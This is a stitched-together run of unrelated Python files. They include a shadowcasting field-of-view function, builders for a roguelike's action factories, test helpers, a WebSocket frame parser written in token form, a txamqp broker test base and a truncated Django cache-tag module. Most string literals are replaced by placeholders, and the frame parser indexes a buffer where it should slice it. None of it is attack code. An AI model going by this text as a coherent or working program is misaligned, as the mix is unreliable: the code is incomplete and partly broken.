mult = [[1, 0, 0, -1, -1, 0, 0, 1],
        [0, 1, -1, 0, 0, -1, 1, 0],
        [0, 1, 1, 0, 0, -1, -1, 0],
        [1, 0, 0, 1, -1, 0, 0, -1]]


def cast_light(cx, cy, row, start, end, radius, xx, xy, yx, yy, fov_matrix,
               level):
    """Scan one octant, marking visible cells in ``fov_matrix``.

    Recursive shadowcasting: ``start``/``end`` are the slopes bounding the
    currently visible wedge, (xx, xy, yx, yy) transform scan coordinates
    into one of the eight octants around the origin (cx, cy).
    ``fov_matrix`` is mutated in place and returned from the outermost call.
    """
    if start < end:
        # wedge has collapsed, nothing left to see here
        return
    radius_squared = radius * radius
    for j in range(row, radius + 1):
        dx, dy = -j - 1, -j
        blocked = False
        while dx <= 0:
            dx += 1
            # translate dx, dy into map coordinates for this octant
            X, Y = cx + dx * xx + dy * xy, cy + dx * yx + dy * yy
            # slopes of the left and right extremities of the current cell
            l_slope, r_slope = (dx - 0.5) / (dy + 0.5), (dx + 0.5) / (dy - 0.5)
            if start < r_slope:
                # cell lies before the wedge; keep scanning
                continue
            elif end > l_slope:
                # cell lies past the wedge; rest of the row is hidden
                break
            else:
                if dx * dx + dy * dy < radius_squared:
                    # cell is within the light radius
                    fov_matrix[(X, Y)] = True
                if blocked:
                    # currently scanning a run of blocking cells
                    if blocks_los(level, (X, Y)):
                        new_start = r_slope
                        continue
                    else:
                        blocked = False
                        # resume with the wedge narrowed past the blockers
                        start = new_start
                else:
                    if blocks_los(level, (X, Y)) and j < radius:
                        # hit a blocker: finish the visible part of the
                        # wedge in a child scan, then continue past it
                        blocked = True
                        cast_light(cx, cy, j + 1, start, l_slope,
                                   radius, xx, xy, yx, yy, fov_matrix, level)
                        new_start = r_slope
        if blocked:
            # the row ended on a blocker; deeper rows are fully shadowed
            break
    return fov_matrix


def do_fov(x, y, radius, fov_matrix, level):
    """Run :func:`cast_light` for all eight octants around (x, y)."""
    for oct in range(8):  # NOTE(review): 'oct' shadows the builtin
        cast_light(x, y, 1, 1.0, 0.0, radius,
                   mult[0][oct], mult[1][oct],
                   mult[2][oct], mult[3][oct], fov_matrix, level)
    return fov_matrix


def get_fov_matrix(location, level, distance):
    """Return a mapping of visible locations to True.

    The origin ``location`` is always visible and seeds the matrix.
    """
    fov_matrix = {}
    fov_matrix[location] = True
    return do_fov(location[0],
                  location[1], distance,
                  fov_matrix, level)
"""Builders for constructing action factories and their sub-factories."""
from pyherc.rules import Dying
from pyherc.rules.combat import RangedCombatFactory
from pyherc.rules.combat.factories import (AttackFactory, MeleeCombatFactory,
                                           UnarmedCombatFactory)
from pyherc.rules.consume.factories import DrinkFactory
from pyherc.rules.digging.factories import DigFactory
from pyherc.rules.inventory.equip import EquipFactory
from pyherc.rules.inventory.factories import (DropFactory, InventoryFactory,
                                              PickUpFactory)
from pyherc.rules.inventory.unequip import UnEquipFactory
from pyherc.rules.magic import GainDomainFactory, SpellCastingFactory
from pyherc.rules.mitosis.factory import MitosisFactory
from pyherc.rules.metamorphosis.factory import MetamorphosisFactory
from pyherc.rules.moving.factories import MoveFactory
from pyherc.rules.trapping.factory import TrappingFactory
from pyherc.rules.public import ActionFactory
from pyherc.rules.waiting.factories import WaitFactory
from random import Random


class ActionFactoryBuilder():
    """Fluent builder for :class:`ActionFactory`.

    Each ``with_*`` method either switches on a real sub-factory or
    accepts a caller-supplied factory (or factory builder) and returns
    ``self`` so calls can be chained.
    """

    def __init__(self):
        """Start with no sub-factories and real dying rules."""
        super().__init__()
        self.model = None
        self.factories = []
        self.dying_rules = Dying()
        self.effect_factory = None
        self.use_real_attack_factory = False
        self.use_real_drink_factory = False
        self.use_real_inventory_factory = False
        self.use_real_move_factory = False
        self.use_real_spellcasting_factory = False
        self.use_real_wait_factory = False
        self.use_real_gain_domain_factory = False
        self.use_real_dying_rules = False
        self.use_real_mitosis_factory = False
        self.use_real_metamorphosis_factory = False
        self.use_real_dig_factory = False
        self.use_real_trapping_factory = False

    def with_move_factory(self):
        """Use a real move factory."""
        self.use_real_move_factory = True
        return self

    def with_attack_factory(self):
        """Use a real attack factory."""
        self.use_real_attack_factory = True
        return self

    def with_drink_factory(self, drink_factory=None):
        """Use a real drink factory, or the given factory/builder."""
        if drink_factory is None:
            self.use_real_drink_factory = True
        else:
            # accept either a ready factory or a builder exposing build()
            if hasattr(drink_factory, '<STR_LIT>'):
                self.factories.append(drink_factory.build())
            else:
                self.factories.append(drink_factory)
        return self

    def with_spellcasting_factory(self, spellcasting_factory=None):
        """Use a real spell casting factory, or the given factory/builder."""
        if not spellcasting_factory:
            self.use_real_spellcasting_factory = True
        else:
            if hasattr(spellcasting_factory, '<STR_LIT>'):
                self.factories.append(spellcasting_factory.build())
            else:
                self.factories.append(spellcasting_factory)
        return self

    def with_wait_factory(self, wait_factory=None):
        """Use a real wait factory, or the given factory/builder."""
        if not wait_factory:
            self.use_real_wait_factory = True
        else:
            if hasattr(wait_factory, '<STR_LIT>'):
                self.factories.append(wait_factory.build())
            else:
                self.factories.append(wait_factory)
        return self

    def with_inventory_factory(self):
        """Use a real inventory factory."""
        self.use_real_inventory_factory = True
        return self

    def with_effect_factory(self, effect_factory):
        """Use the given effect factory."""
        self.effect_factory = effect_factory
        return self

    def with_dying_rules(self):
        """Use real dying rules."""
        self.use_real_dying_rules = True
        return self

    def with_gain_domain_factory(self, gain_domain_factory=None):
        """Use a real gain domain factory, or the given one."""
        if gain_domain_factory:
            self.factories.append(gain_domain_factory)
        else:
            self.use_real_gain_domain_factory = True
        return self

    def with_mitosis_factory(self, mitosis_factory=None):
        """Use a real mitosis factory, or the given one."""
        if mitosis_factory:
            self.factories.append(mitosis_factory)
        else:
            self.use_real_mitosis_factory = True
        return self

    def with_metamorphosis_factory(self, metamorphosis_factory=None):
        """Use a real metamorphosis factory, or the given one."""
        if metamorphosis_factory:
            self.factories.append(metamorphosis_factory)
        else:
            self.use_real_metamorphosis_factory = True
        return self

    def with_dig_factory(self, dig_factory=None):
        """Use a real dig factory, or the given one."""
        if dig_factory:
            self.factories.append(dig_factory)
        else:
            self.use_real_dig_factory = True
        return self

    def with_trapping_factory(self, trapping_factory=None):
        """Use a real trapping factory, or the given one."""
        if trapping_factory:
            self.factories.append(trapping_factory)
        else:
            self.use_real_trapping_factory = True
        return self

    def build(self):
        """Build the configured :class:`ActionFactory`."""
        if self.use_real_dying_rules:
            self.dying_rules = Dying()
        if self.use_real_attack_factory:
            unarmed_combat_factory = UnarmedCombatFactory(self.effect_factory,
                                                          self.dying_rules)
            melee_combat_factory = MeleeCombatFactory(self.effect_factory,
                                                      self.dying_rules)
            ranged_combat_factory = RangedCombatFactory(self.effect_factory,
                                                        self.dying_rules)
            self.factories.append(AttackFactory([unarmed_combat_factory,
                                                 melee_combat_factory,
                                                 ranged_combat_factory]))
        if self.use_real_drink_factory:
            self.factories.append((DrinkFactoryBuilder()
                                   .with_effect_factory(self.effect_factory)
                                   .with_dying_rules(self.dying_rules)
                                   .build()))
        if self.use_real_inventory_factory:
            self.factories.append(InventoryFactory([PickUpFactory(),
                                                    DropFactory(),
                                                    EquipFactory(),
                                                    UnEquipFactory()]))
        if self.use_real_move_factory:
            self.factories.append(MoveFactory(None, self.dying_rules))
        if self.use_real_spellcasting_factory:
            self.factories.append(SpellCastingFactoryBuilder().build())
        if self.use_real_wait_factory:
            self.factories.append(WaitFactoryBuilder().build())
        if self.use_real_gain_domain_factory:
            self.factories.append(GainDomainFactoryBuilder().build())
        if self.use_real_mitosis_factory:
            self.factories.append(MitosisFactoryBuilder()
                                  .with_dying_rules(self.dying_rules)
                                  .build())
        if self.use_real_metamorphosis_factory:
            self.factories.append(MetamorphosisFactoryBuilder().build())
        if self.use_real_dig_factory:
            self.factories.append(DigFactoryBuilder().build())
        if self.use_real_trapping_factory:
            self.factories.append(TrappingFactoryBuilder().build())
        action_factory = ActionFactory(self.model,
                                       self.factories)
        return action_factory


class DrinkFactoryBuilder():
    """Fluent builder for :class:`DrinkFactory`."""

    def __init__(self):
        """Start with no effect factory and real dying rules."""
        super().__init__()
        self.effect_factory = None
        self.dying_rules = Dying()
        self.use_real_dying_rules = False

    def with_effect_factory(self, effect_factory):
        """Use the given effect factory."""
        self.effect_factory = effect_factory
        return self

    def with_dying_rules(self, dying_rules=None):
        """Use the given dying rules, or real ones when omitted."""
        if dying_rules is not None:
            self.dying_rules = dying_rules
        else:
            self.use_real_dying_rules = True
        return self

    def build(self):
        """Build the configured :class:`DrinkFactory`."""
        if self.use_real_dying_rules:
            self.dying_rules = Dying()
        return DrinkFactory(self.effect_factory,
                            self.dying_rules)


class WaitFactoryBuilder():
    """Builder for :class:`WaitFactory`."""

    def __init__(self):
        """Default constructor."""
        super().__init__()

    def build(self):
        """Build a :class:`WaitFactory`."""
        return WaitFactory()


class GainDomainFactoryBuilder():
    """Builder for :class:`GainDomainFactory`."""

    def __init__(self):
        """Default constructor."""
        super().__init__()

    def build(self):
        """Build a :class:`GainDomainFactory`."""
        return GainDomainFactory()


class SpellCastingFactoryBuilder():
    """Fluent builder for :class:`SpellCastingFactory`."""

    def __init__(self):
        """Start with no spell or effects factory."""
        super().__init__()
        self.spell_factory = None
        self.use_real_spell_factory = False
        self.effects_factory = None
        self.use_real_effects_factory = False

    def with_spell_factory(self, spell_factory=None):
        """Use the given spell factory/builder, or a real one when omitted."""
        if not spell_factory:
            self.use_real_spell_factory = True
        else:
            if hasattr(spell_factory, '<STR_LIT>'):
                self.spell_factory = spell_factory.build()
            else:
                self.spell_factory = spell_factory
        return self

    def with_effects_factory(self, effects_factory=None):
        """Use the given effects factory/builder, or a real one when omitted."""
        if effects_factory:
            if hasattr(effects_factory, '<STR_LIT>'):
                self.effects_factory = effects_factory.build()
            else:
                self.effects_factory = effects_factory
        else:
            self.use_real_effects_factory = True
        return self

    def build(self):
        """Build the configured :class:`SpellCastingFactory`."""
        if self.use_real_spell_factory:
            # real spell factory construction not implemented yet
            pass
        if self.use_real_effects_factory:
            # real effects factory construction not implemented yet
            pass
        return SpellCastingFactory(spell_factory=self.spell_factory,
                                   effects_factory=self.effects_factory,
                                   dying_rules=Dying())


class MitosisFactoryBuilder():
    """Fluent builder for :class:`MitosisFactory`."""

    def __init__(self):
        """Start with no generator, a limit of 30 and real dying rules."""
        super().__init__()
        self.character_generator = None
        self.character_limit = 30
        self.rng = Random()
        self.dying_rules = Dying()
        self.use_real_dying_rules = False

    def with_character_limit(self, character_limit):
        """Use the given character limit."""
        self.character_limit = character_limit
        return self

    def with_character_generator(self, generator):
        """Use the given character generator."""
        self.character_generator = generator
        return self

    def with_random_number_generator(self, rng):
        """Use the given random number generator.

        Fixed: now returns ``self`` like every other fluent setter
        (previously returned ``None``, breaking call chaining).
        """
        self.rng = rng
        return self

    def with_dying_rules(self, dying_rules=None):
        """Use the given dying rules, or real ones when omitted."""
        if dying_rules:
            self.dying_rules = dying_rules
        else:
            self.dying_rules = Dying()
        return self

    def build(self):
        """Build the configured :class:`MitosisFactory`."""
        return MitosisFactory(character_generator=self.character_generator,
                              character_limit=self.character_limit,
                              rng=self.rng,
                              dying_rules=self.dying_rules)


class MetamorphosisFactoryBuilder():
    """Fluent builder for :class:`MetamorphosisFactory`."""

    def __init__(self):
        """Start with no generator and a default RNG."""
        super().__init__()
        self.character_generator = None
        self.rng = Random()

    def with_character_generator(self, generator):
        """Use the given character generator."""
        self.character_generator = generator
        return self

    def with_random_number_generator(self, rng):
        """Use the given random number generator."""
        self.rng = rng
        return self

    def build(self):
        """Build the configured :class:`MetamorphosisFactory`."""
        return MetamorphosisFactory(character_generator=self.character_generator,
                                    rng=self.rng)


class DigFactoryBuilder():
    """Fluent builder for :class:`DigFactory`."""

    def __init__(self):
        """Start with a default RNG."""
        super().__init__()
        self.rng = Random()

    def with_random_number_generator(self, rng):
        """Use the given random number generator.

        Fixed: ``self`` was missing from the parameter list, so any call
        raised an error before doing anything useful.
        """
        self.rng = rng
        return self

    def build(self):
        """Build the configured :class:`DigFactory`."""
        return DigFactory(self.rng)


class TrappingFactoryBuilder():
    """Fluent builder for :class:`TrappingFactory`."""

    def __init__(self):
        """Start with no trap creator."""
        super().__init__()
        self.trap_creator = None

    def with_trap_creator(self, trap_creator):
        """Use the given trap creator."""
        self.trap_creator = trap_creator
        return self

    def build(self):
        """Build the configured :class:`TrappingFactory`."""
        return TrappingFactory(self.trap_creator)
"""Mockito matcher for checking event types."""
from mockito.matchers import Matcher
from pyherc.events import e_event_type


class EventType(Matcher):
    """Matcher that accepts any event of a given type."""

    def __init__(self, type):
        """Remember the event type to match against."""
        super().__init__()
        self.event_type = type

    def matches(self, arg):
        """Return True when ``arg`` is truthy and has the expected type."""
        return bool(arg) and e_event_type(arg) == self.event_type

    def __repr__(self):
        """Describe this matcher for verification failure messages."""
        return '<STR_LIT>'.format(self.event_type)


def event_type_of(event_type):
    """Shorthand factory for an :class:`EventType` matcher."""
    return EventType(event_type)
"""Tests for the event dispatching behaviour of :class:`Model`."""
from hamcrest import assert_that
from mockito import mock, verify
from pyherc.data import Model
from pyherc.events import new_move_event
from pyherc.test.builders import CharacterBuilder, LevelBuilder
from pyherc.test.matchers import has_event_listener


class TestModel():
    """Test suite for model event listeners."""

    def __init__(self):
        """Default constructor."""
        super().__init__()
        self.model = None
        self.listener = None
        self.level = None

    def setup(self):
        """Build a fresh model with one registered mock listener."""
        self.listener = mock()
        self.level = LevelBuilder().build()
        self.model = Model()
        self.model.register_event_listener(self.listener)

    def test_registering_event_listener(self):
        """A registered listener is known to the model."""
        assert_that(self.model, has_event_listener(self.listener))

    def test_dispatching_event_to_listeners(self):
        """A raised event is delivered to every registered listener."""
        character = (CharacterBuilder()
                     .with_model(self.model)
                     .build())
        event = new_move_event(character=character,
                               old_location=(5, 5),
                               old_level=self.level,
                               direction=1)
        self.model.raise_event(event)
        verify(self.listener).receive_event(event)
<s> import random <EOL> from exception import FrameError <EOL> class Frame ( object ) : <EOL> def __init__ ( self , buf ) : <EOL> self . buf = buf <EOL> self . msg = "<STR_LIT>" <EOL> self . mask = <NUM_LIT:0> <EOL> self . key = "<STR_LIT>" <EOL> self . len = <NUM_LIT:0> <EOL> self . fin = <NUM_LIT:0> <EOL> self . payload = <NUM_LIT:0> <EOL> self . opcode = <NUM_LIT:0> <EOL> self . frame_length = <NUM_LIT:0> <EOL> self . isReady ( ) <EOL> def isReady ( self ) : <EOL> buf = self . buf <EOL> if len ( buf ) < <NUM_LIT:2> : <EOL> raise FrameError ( "<STR_LIT>" ) <EOL> self . fin = ord ( buf [ <NUM_LIT:0> ] ) >> <NUM_LIT:7> <EOL> self . opcode = ord ( buf [ <NUM_LIT:0> ] ) & <NUM_LIT> <EOL> self . payload = ord ( buf [ <NUM_LIT:1> ] ) & <NUM_LIT> <EOL> self . mask = ord ( buf [ <NUM_LIT:1> ] ) >> <NUM_LIT:7> <EOL> buf = buf [ <NUM_LIT:2> : ] <EOL> if self . payload < <NUM_LIT> : <EOL> self . len = self . payload <EOL> if self . mask : <EOL> self . frame_length = <NUM_LIT:6> + self . len <EOL> else : <EOL> self . frame_length = <NUM_LIT:2> + self . len <EOL> if self . frame_length > len ( self . buf ) : <EOL> raise FrameError ( "<STR_LIT>" ) <EOL> if len ( buf ) < <NUM_LIT:4> and self . mask : <EOL> raise FrameError ( "<STR_LIT>" ) <EOL> if self . mask : <EOL> self . key = buf [ : <NUM_LIT:4> ] <EOL> buf = buf [ <NUM_LIT:4> : <NUM_LIT:4> + len ( buf ) + <NUM_LIT:1> ] <EOL> else : <EOL> buf = buf [ : self . len ] <EOL> elif self . payload == <NUM_LIT> : <EOL> if len ( buf ) < <NUM_LIT:6> and self . mask : <EOL> raise FrameError ( "<STR_LIT>" ) <EOL> for k , i in [ ( <NUM_LIT:0> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) ] : <EOL> self . len += ( ord ( buf [ k ] ) * <NUM_LIT:1> << ( <NUM_LIT:8> * i ) ) <EOL> if self . mask : <EOL> self . frame_length = <NUM_LIT:8> + self . len <EOL> else : <EOL> self . frame_length = <NUM_LIT:4> + self . len <EOL> if self . frame_length > len ( self . 
buf ) : <EOL> raise FrameError ( "<STR_LIT>" ) <EOL> buf = buf [ <NUM_LIT:2> : ] <EOL> if self . mask : <EOL> self . key = buf [ : <NUM_LIT:4> ] <EOL> buf = buf [ <NUM_LIT:4> : <NUM_LIT:4> + len ( buf ) + <NUM_LIT:1> ] <EOL> else : <EOL> buf = buf [ : self . len ] <EOL> else : <EOL> if len ( buf ) < <NUM_LIT:10> and self . mask : <EOL> raise FrameError ( "<STR_LIT>" ) <EOL> for k , i in [ ( <NUM_LIT:0> , <NUM_LIT:7> ) , ( <NUM_LIT:1> , <NUM_LIT:6> ) , ( <NUM_LIT:2> , <NUM_LIT:5> ) , ( <NUM_LIT:3> , <NUM_LIT:4> ) , ( <NUM_LIT:4> , <NUM_LIT:3> ) , ( <NUM_LIT:5> , <NUM_LIT:2> ) , ( <NUM_LIT:6> , <NUM_LIT:1> ) , ( <NUM_LIT:7> , <NUM_LIT:0> ) ] : <EOL> self . len += ( ord ( buf [ k ] ) * <NUM_LIT:1> << ( <NUM_LIT:8> * i ) ) <EOL> if self . mask : <EOL> self . frame_length = <NUM_LIT> + self . len <EOL> else : <EOL> self . frame_length = <NUM_LIT:10> + self . len <EOL> if self . frame_length > len ( self . buf ) : <EOL> raise FrameError ( "<STR_LIT>" ) <EOL> buf = buf [ <NUM_LIT:8> : ] <EOL> if self . mask : <EOL> self . key = buf [ : <NUM_LIT:4> ] <EOL> buf = buf [ <NUM_LIT:4> : <NUM_LIT:4> + len ( buf ) + <NUM_LIT:1> ] <EOL> else : <EOL> buf = buf [ self . len ] <EOL> self . msg = buf <EOL> def message ( self ) : <EOL> if not self . mask : <EOL> return self . msg <EOL> decoded_msg = "<STR_LIT>" <EOL> for i in xrange ( self . len ) : <EOL> c = ord ( self . msg [ i ] ) ^ ord ( self . key [ i % <NUM_LIT:4> ] ) <EOL> decoded_msg += str ( chr ( c ) ) <EOL> return decoded_msg <EOL> def length ( self ) : <EOL> return self . frame_length <EOL> @ staticmethod <EOL> def encodeMessage ( buf , key ) : <EOL> encoded_msg = "<STR_LIT>" <EOL> buf_len = len ( buf ) <EOL> for i in xrange ( buf_len ) : <EOL> c = ord ( buf [ i ] ) ^ ord ( key [ i % <NUM_LIT:4> ] ) <EOL> encoded_msg += str ( chr ( c ) ) <EOL> return encoded_msg <EOL> @ staticmethod <EOL> def buildMessage ( buf , mask = True ) : <EOL> c_buf = buf <EOL> msg = "<STR_LIT>" <EOL> if mask : <EOL> key = "<STR_LIT>" . 
join ( [ str ( chr ( random . randrange ( <NUM_LIT:1> , <NUM_LIT:255> ) ) ) for i in xrange ( <NUM_LIT:4> ) ] ) <EOL> o = ( <NUM_LIT:1> << <NUM_LIT:7> ) + <NUM_LIT:1> <EOL> msg += str ( chr ( o ) ) <EOL> buf_len = len ( buf ) <EOL> if buf_len < <NUM_LIT> : <EOL> o = buf_len <EOL> if mask : <EOL> msg += str ( chr ( o + ( <NUM_LIT:1> << <NUM_LIT:7> ) ) ) <EOL> else : <EOL> msg += str ( chr ( o ) ) <EOL> if mask : <EOL> msg += key <EOL> msg += Frame . encodeMessage ( buf , key ) <EOL> else : <EOL> msg += buf <EOL> return msg <EOL> if buf_len <= ( ( <NUM_LIT:1> << <NUM_LIT:16> ) - <NUM_LIT:1> ) : <EOL> if mask : <EOL> msg += str ( chr ( <NUM_LIT> + ( <NUM_LIT:1> << <NUM_LIT:7> ) ) ) <EOL> else : <EOL> msg += str ( chr ( <NUM_LIT> ) ) <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:3> ) : <EOL> o = ( buf_len >> ( <NUM_LIT:16> - ( <NUM_LIT:8> * i ) ) ) & ( <NUM_LIT:2> ** <NUM_LIT:8> - <NUM_LIT:1> ) <EOL> msg += str ( chr ( o ) ) <EOL> if mask : <EOL> msg += key <EOL> msg += Frame . encodeMessage ( buf , key ) <EOL> else : <EOL> msg += buf <EOL> return msg <EOL> if buf_len <= ( ( <NUM_LIT:1> << <NUM_LIT:64> ) - <NUM_LIT:1> ) : <EOL> if mask : <EOL> msg += str ( chr ( <NUM_LIT> + ( <NUM_LIT:1> << <NUM_LIT:7> ) ) ) <EOL> else : <EOL> msg += str ( chr ( <NUM_LIT> ) ) <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:9> ) : <EOL> o = ( buf_len >> ( <NUM_LIT:64> - ( <NUM_LIT:8> * i ) ) ) & ( <NUM_LIT:2> ** <NUM_LIT:8> - <NUM_LIT:1> ) <EOL> msg += str ( chr ( o ) ) <EOL> if mask : <EOL> msg += key <EOL> msg += Frame . encodeMessage ( buf , key ) <EOL> else : <EOL> msg += buf <EOL> return msg </s>
# Plugin metadata read by the plugin loader.
pluginName = "<STR_LIT>"
enable = False
type = "<STR_LIT:test>"


class PluginClass:
    """Dummy plugin that emits a single fixed rule with a matching comment."""

    def run(self, pcap, apk):
        """Return (plugin name, rules, comments); pcap and apk are unused."""
        rules = ['<STR_LIT>']
        comments = ["<STR_LIT>"]
        return (pluginName, rules, comments)
# Package entry point: run the program and exit with its return code.
import sys
from .program import run

sys.exit(run())
<s> '''<STR_LIT>''' </s>
<s> from __future__ import print_function <EOL> from datetime import datetime <EOL> import six <EOL> from six . moves . urllib . parse import quote <EOL> from email . utils import parsedate <EOL> def parse_datetime ( string ) : <EOL> return datetime ( * ( parsedate ( string ) [ : <NUM_LIT:6> ] ) ) <EOL> def parse_html_value ( html ) : <EOL> return html [ html . find ( '<STR_LIT:>>' ) + <NUM_LIT:1> : html . rfind ( '<STR_LIT:<>' ) ] <EOL> def parse_a_href ( atag ) : <EOL> start = atag . find ( '<STR_LIT:">' ) + <NUM_LIT:1> <EOL> end = atag . find ( '<STR_LIT:">' , start ) <EOL> return atag [ start : end ] <EOL> def convert_to_utf8_str ( arg ) : <EOL> if isinstance ( arg , six . text_type ) : <EOL> arg = arg . encode ( '<STR_LIT:utf-8>' ) <EOL> elif not isinstance ( arg , bytes ) : <EOL> arg = six . text_type ( arg ) . encode ( '<STR_LIT:utf-8>' ) <EOL> return arg <EOL> def import_simplejson ( ) : <EOL> try : <EOL> import simplejson as json <EOL> except ImportError : <EOL> try : <EOL> import json <EOL> except ImportError : <EOL> try : <EOL> from django . utils import simplejson as json <EOL> except ImportError : <EOL> raise ImportError ( "<STR_LIT>" ) <EOL> return json <EOL> def list_to_csv ( item_list ) : <EOL> if item_list : <EOL> return '<STR_LIT:U+002C>' . join ( [ str ( i ) for i in item_list ] ) </s>
# Test harness for txamqp integration tests against a live AMQP broker
# (Python 2 / Twisted trial).
import os
import warnings
from txamqp.content import Content
import txamqp.spec
from txamqp.protocol import AMQClient
from txamqp.client import TwistedDelegate
from twisted.internet import error, protocol, reactor
from twisted.trial import unittest
from twisted.internet.defer import inlineCallbacks, Deferred, returnValue
from txamqp.queue import Empty

# broker identifiers matched against the environment variable
RABBITMQ = "<STR_LIT>"
OPENAMQ = "<STR_LIT>"
QPID = "<STR_LIT>"


class supportedBrokers(object):
    """Decorator: skip the decorated test unless the configured broker
    is one of the given brokers."""

    def __init__(self, *supporterBrokers):
        self.supporterBrokers = supporterBrokers

    def __call__(self, f):
        if _get_broker() not in self.supporterBrokers:
            # twisted.trial honours a 'skip' attribute on test methods
            f.skip = "<STR_LIT>"
        return f


def _get_broker():
    """Return the broker name from the environment, or None when unset."""
    return os.environ.get("<STR_LIT>")


# default credentials used to connect to the broker
USERNAME = '<STR_LIT>'
PASSWORD = '<STR_LIT>'
VHOST = '<STR_LIT:/>'
HEARTBEAT = 0


class TestBase(unittest.TestCase):
    """Base class for broker-backed tests.

    Tracks declared queues, exchanges and open connections so they can
    be cleaned up in tearDown.
    """

    clientClass = AMQClient
    heartbeat = HEARTBEAT

    def __init__(self, *args, **kwargs):
        unittest.TestCase.__init__(self, *args, **kwargs)
        self.host = '<STR_LIT:localhost>'
        self.port = <NUM_LIT>
        self.broker = _get_broker()
        if self.broker is None:
            # no broker configured: warn and fall back to RabbitMQ
            warnings.warn(
                "<STR_LIT>"
                "<STR_LIT>")
            self.broker = RABBITMQ
        # pick the AMQP spec file matching the broker
        if self.broker == RABBITMQ:
            self.spec = '<STR_LIT>'
        elif self.broker == OPENAMQ:
            self.spec = '<STR_LIT>'
        elif self.broker == QPID:
            self.spec = '<STR_LIT>'
        else:
            raise RuntimeError(
                "<STR_LIT>"
                "<STR_LIT>" % self.broker)
        self.user = USERNAME
        self.password = PASSWORD
        self.vhost = VHOST
        # bookkeeping for tearDown cleanup
        self.queues = []
        self.exchanges = []
        self.connectors = []

    @inlineCallbacks
    def connect(self, host=None, port=None, spec=None, user=None, password=None, vhost=None,
                heartbeat=None, clientClass=None):
        """Open an AMQP connection, authenticate, and return the client.

        Any argument left as None falls back to the instance default.
        """
        host = host or self.host
        port = port or self.port
        spec = spec or self.spec
        user = user or self.user
        password = password or self.password
        vhost = vhost or self.vhost
        heartbeat = heartbeat or self.heartbeat
        clientClass = clientClass or self.clientClass
        delegate = TwistedDelegate()
        onConn = Deferred()
        p = clientClass(delegate, vhost, txamqp.spec.load(spec), heartbeat=heartbeat)
        f = protocol._InstanceFactory(reactor, p, onConn)
        c = reactor.connectTCP(host, port, f)

        def errb(thefailure):
            # surface a helpful message when the broker is unreachable
            thefailure.trap(error.ConnectionRefusedError)
            print "<STR_LIT>" "<STR_LIT>" % (host, port, self.broker, thefailure, )
            thefailure.raiseException()
        onConn.addErrback(errb)
        self.connectors.append(c)
        client = yield onConn
        yield client.authenticate(user, password)
        returnValue(client)

    @inlineCallbacks
    def setUp(self):
        """Connect to the broker and open channel 1."""
        try:
            self.client = yield self.connect()
        except txamqp.client.Closed, le:
            # prepend connection details to the error for easier debugging
            le.args = tuple(("<STR_LIT>" "<STR_LIT>" "<STR_LIT>" % (_get_broker(),
                            USERNAME, PASSWORD, VHOST), ) + le.args)
            raise
        self.channel = yield self.client.channel(1)
        yield self.channel.channel_open()

    @inlineCallbacks
    def tearDown(self):
        """Delete declared queues/exchanges and drop all connections."""
        for ch, q in self.queues:
            yield ch.queue_delete(queue=q)
        for ch, ex in self.exchanges:
            yield ch.exchange_delete(exchange=ex)
        for connector in self.connectors:
            yield connector.disconnect()

    @inlineCallbacks
    def queue_declare(self, channel=None, *args, **keys):
        """Declare a queue and remember it for cleanup in tearDown."""
        channel = channel or self.channel
        reply = yield channel.queue_declare(*args, **keys)
        self.queues.append((channel, reply.queue))
        returnValue(reply)

    @inlineCallbacks
    def exchange_declare(self, channel=None, ticket=0, exchange='<STR_LIT>',
                         type='<STR_LIT>', passive=False, durable=False,
                         auto_delete=False, internal=False, nowait=False,
                         arguments={}):
        """Declare an exchange and remember it for cleanup in tearDown."""
        # NOTE(review): 'arguments={}' is a mutable default argument — safe
        # only while nothing ever mutates it; worth confirming
        channel = channel or self.channel
        reply = yield channel.exchange_declare(ticket, exchange, type, passive, durable, auto_delete, internal, nowait, arguments)
        self.exchanges.append((channel, exchange))
        returnValue(reply)

    def assertChannelException(self, expectedCode, message):
        """Assert that ``message`` is a channel close with ``expectedCode``."""
        self.assertEqual("<STR_LIT>", message.method.klass.name)
        self.assertEqual("<STR_LIT>", message.method.name)
        self.assertEqual(expectedCode, message.reply_code)

    def assertConnectionException(self, expectedCode, message):
        """Assert that ``message`` is a connection close with ``expectedCode``."""
        self.assertEqual("<STR_LIT>", message.method.klass.name)
        self.assertEqual("<STR_LIT>", message.method.name)
        self.assertEqual(expectedCode, message.reply_code)

    @inlineCallbacks
    def consume(self, queueName):
        """Start a no-ack consumer on ``queueName`` and return its queue."""
        reply = yield self.channel.basic_consume(queue=queueName, no_ack=True)
        returnValue((yield self.client.queue(reply.consumer_tag)))

    @inlineCallbacks
    def assertEmpty(self, queue):
        """Assert that getting from ``queue`` times out (queue is empty)."""
        try:
            yield queue.get(timeout=1)
            self.fail("<STR_LIT>")
        except Empty: None

    @inlineCallbacks
    def assertPublishGet(self, queue, exchange="<STR_LIT>", routing_key="<STR_LIT>", properties=None):
        """Publish a message and assert the same body arrives on ``queue``."""
        body = self.uniqueString()
        self.channel.basic_publish(exchange=exchange,
                                   content=Content(body, properties=properties),
                                   routing_key=routing_key)
        msg = yield queue.get(timeout=1)
        self.assertEqual(body, msg.content.body)
        if (properties): self.assertEqual(properties, msg.content.properties)

    def uniqueString(self):
        """Return a message body for publish/consume round-trips."""
        # NOTE(review): the counter is initialised but never incremented, so
        # repeated calls return the same string — confirm whether intended
        if not "<STR_LIT>" in dir(self): self.uniqueCounter = 1;
        return "<STR_LIT>" + str(self.uniqueCounter)

    @inlineCallbacks
    def assertPublishConsume(self, queue="<STR_LIT>", exchange="<STR_LIT>", routing_key="<STR_LIT>", properties=None):
        """Publish via ``exchange``/``routing_key`` and consume from ``queue``."""
        yield self.assertPublishGet((yield self.consume(queue)), exchange, routing_key, properties)
"""Template tags exercising adv_cache_tag customisation hooks."""
from django import template
from adv_cache_tag.tag import CacheTag, Node

register = template.Library()


class TestNode(Node):
    """Cache node carrying an extra 'multiplicator' tag argument."""

    def __init__(self, nodename, nodelist, expire_time, multiplicator, fragment_name, vary_on):
        """Store the multiplicator and delegate the rest to ``Node``."""
        super(TestNode, self).__init__(nodename, nodelist, expire_time, fragment_name, vary_on)
        self.multiplicator = multiplicator


class TestCacheTag(CacheTag):
    """Cache tag whose expiry time is scaled by a template-provided factor."""

    class Meta(CacheTag.Meta):
        compress_spaces = True

    # use the node subclass that accepts the extra argument
    Node = TestNode

    @classmethod
    def get_template_node_arguments(cls, tokens):
        """Split tag tokens into (expire_time, multiplicator, fragment_name, vary_on)."""
